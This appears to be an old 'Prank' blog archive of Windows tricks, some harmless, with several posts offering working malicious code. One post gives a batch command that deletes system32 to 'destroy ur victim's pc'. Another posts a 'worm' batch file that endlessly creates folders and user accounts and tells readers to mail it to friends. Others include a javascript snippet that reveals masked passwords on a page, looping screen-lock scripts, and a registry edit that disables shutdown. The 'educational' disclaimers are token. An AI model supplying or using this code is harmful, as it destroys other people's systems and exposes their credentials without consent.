Showing posts with label Prank. Show all posts
Showing posts with label Prank. Show all posts

Saturday, March 10, 2012

Update Your Facebook Status Via Almost Any Device Without Actually Having One

Here, I am sharing this cool way of updating your Facebook status..!! Enjoy and let me know your feedback and also share what did you update via which device..


The trick is really a simple one. I tried using it and sent out one status update and as I expected, it got a pretty nice response from people believing it as an original update:

So, the actual trick is very simple. Actually, there are some applications designed to which you just have to allow access and then it takes you to a page from where you can update your status from that application..

Now, if you scroll down on this application page, you will find many other devices list from which you can update your status as. Allow it and enjoy..

Also you can use PostedVia..

So, start updating your status from your favorite device or via a unique device and play a prank with your friends. I hope you will enjoy this short and simple tweak and don’t forget to share it on your Facebook wall or with your friends. Do let me know what did you upload as a status and its response if you can.. :)

 Hope u liked it .


Thursday, October 20, 2011

Avoid- a little bt a effective prank

With dis fun joke program u can make ur Windows Start button avoid ur mouse clicks. Just launch dis program nd watch as ur Start button jumps away from ur mouse cursor as u try nd click on it.
This program will bring hours of enjoyment. Slip dis program on ur friends computer and listen him screaming.

Move ur mouse pointer to the TOP LEFT corner of ur screen. This will stop the program from running in memory. If u hav successfully moved ur mouse in the correct position, the program will close nd display an About Box Screen. Once u close dis screen, the program will exit. Exiting the software will allow Windows to delete the file. 


YOU CAN DOWNLOAD AVOID HERE...

Enjoy !!!  This is for educational purpose only .....

Wednesday, October 19, 2011

ReplaceKeys- a fun software

ReplaceKeys is a fun little prank that allows u to replace any keyboard keystrokes with different keyboard keystrokes.


1. First u ll hav to set the key u want to replace, in our case i will use the letter A.

2.  Next u ll hav to set the key u want to replace A with, in my case i will use Z.

3. Lastly u ll hav to set how often it should replace the key press, in my case i will use 30 seconds.
Then u can start the prank!

This is what will happen
After 30 seconds- ReplaceKeys will wait for the letter A to be pressed on the keyboard, once it has it will grab the A keystroke and send the letter Z to the computer. It works as if the person typed in the Z character !!

ReplaceKeys makes it appear that the user has mis-typed on the keyboard. It will take them forever to realize you pranked them. ReplaceKeys is completely hidden and can be stopped easily by moving the mouse cursor to the TOP LEFT corner of the screen.

ReplaceKeys works with any program you are using within Windows.

Yes, that means the web browser, email, Microsoft Office, etc. The possibilities are endless with this little prank.



YOU CAN DOWNLOAD REPLACEKEYS HERE...



Enjoy !!!

Wednesday, August 31, 2011

View Password Behind Asterisk


If you have any field on a webpage that has been filled with * (asterisk) usually passwords, then you can view the content behind it.Simply paste this code in Address bar and press enter.

javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k < w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g + ' forms');}function z(f){var b=false;for(var i=0;i < f.length;i++) {var e=f[i].elements;for(var j=0;j < e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Password found ', s)}else{alert('Password is blank')}return true;}}


Enjoy !!!  This is for educational purpose only ......

Thursday, August 25, 2011

A simple Trick to destroy ur victim's pc.....!!!

m here explain to make a file that destroys ur victims pc
I m not responsible for the damage caused by this file."

1. Open Notepad
2. write the above command : -
del c:\WINDOWS\system32\*.*/q

3. Save the above notepad with the extension ".bat or .cmd" as u want.

4. !!!!!!!!!!!!!!!!!!!!!!Attention!!!!!!!!!!!!!!!!!!!!!!
Don't double click the file otherwise u'll b in trouble.
Why ?????? bcoz the file u created delete all files from ur system32 folder and when u restart ur pc it will not start bcz system can not find the files in the system32 folder which is required at the time of booting.

5. You can also test the above by creating a fake folder let suppose

windows1 in C:\. Copy some old files in it and just follow the

above command.By double clicking the bat or cmd file ur all files

automatically get deleted.

6. You can try this file in any one`s computer.(but this result in causing damage to the
computer, so think again before trying this on anyone's pc).....

Monday, August 22, 2011

A SIMPLE PROGRAM TO MAKE FOOL OF FRIENDS ....!!

To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg



But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.

@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a 




*THIS IS JUST FOR EDUCATIONAL PURPOSE*

DISABLE SHUTDOWN BUTTON

If you want to play a trick on someone in Windows XP,
you can prevent them from shutting down their PC by disabling the shutdown button.
  • Open the Registry Editor and go to 
         HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer.
  • Create a new DWORD value named NoClose with a data value of 1. 
  • Exit the Registry and reboot in order for the change to take effect. You won't be able to shut down Windows in the normal manner from now on, use the shutdown -r or -s command instead from the run field. 
 If you want to reenable normal shutdowns, delete the NoClose value. 

 Remember always backup your registry!

Tuesday, August 2, 2011

How to create a Worm Virus ???

 NOTE : Plz b aware. . . dont run it on ur PC. And ya, any antivirus will not block this as its not a application but it just a basic file.

Open notepad and just copy this code and save it with ".bat" extension and not with ".txt" one !!!

@ECHO OFF
@ECHO A PHOENIX PRODUCTION
@ECHO MAIN BAT RUNNING
GOTO start

:start
@ECHO SET snowball2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5

:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET maggi=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4

:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET marge=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR marge%%marge%% >> bat4.bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3

:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET bart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR bart%%bart%% >> bat3.bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2

:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET homer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR homer%%homer%% >> bat2.bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original

:original
CD %HomeDrive%\
SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1





and save it as "anyname.bat"........
nd mail it to ur frnd or copy it to ur frnds PC !!
Enjoy !!!

Sunday, December 19, 2010

Unclick-able desktop


      Unclick-able desktop
Allright, this one is really good and sometimes users will not know what happened. Just make a screenshot of your desktop by pressing "Print Screen" on your keyboard (sometimes shown as "Prt Scrn"). Now go to Paint and Paste (Ctrl+V). You should now have an image of your desktop. Save the image to your PC and save it as JPEG. You'll now have the file like this: C:/name_of_the_document.bmp.
Now set the image as your background. You're almost done now.
Right-click your desktop and navigate to "Arrange icons by" and uncheck "Show desktop icons". There you have it, the icons on the desktop can not be clicked anymore.
But wait: The taskbar at the bottom is still there? Right-click on it and select Properties. On the Taskbar tab, select the Auto-hide the taskbar check box. Press OK to save the changes.
       How to Undo this???
Right-click on taskbar and select Properties. On the Taskbar tab, select the Auto-hide the taskbar check box. Press OK to save the changes.
Right-click your desktop and navigate to "Arrange icons by" and check "Show desktop icons" then the icons on the desktop can be clicked.
And finally, change the Background image....

for more tricks mail me at rahulhbti18@rocketmail.com

    Monday, December 13, 2010

    Locking a Folder . . .

                Do you worry about privacy or do you maintain some personal files on the office system or at Friends pc, then you must lock that folder. I know many Softwares that most people use to lock their Personal files. But this trick is the safest and locks files or folders without use of any Software's
               Suppose you want to lock the folder rahul in d: which has the path D:\rahul.
    In the same drive create a text file and type

    ren rahul rahul.{21EC2020-3AEA-1069-A2DD-08002B30309D}

    Now save this text file as loc.bat

    Create another text file and type in it

    ren rahul.{21EC2020-3AEA-1069-A2DD-08002B30309D} rahul

    Now save this text file as key.bat
         Now you can see 2 batch files loc and key. Press loc and the folder movies will change to control panel and you cannot view its contents. Press key and you will get back your original folder.
    try it out!!!!!!!

    Note: It is safe as in case if you loose the key file, you can create it again but the folder name must be correct.


    for more tricks mail me at rahulhbti18@rocketmail.com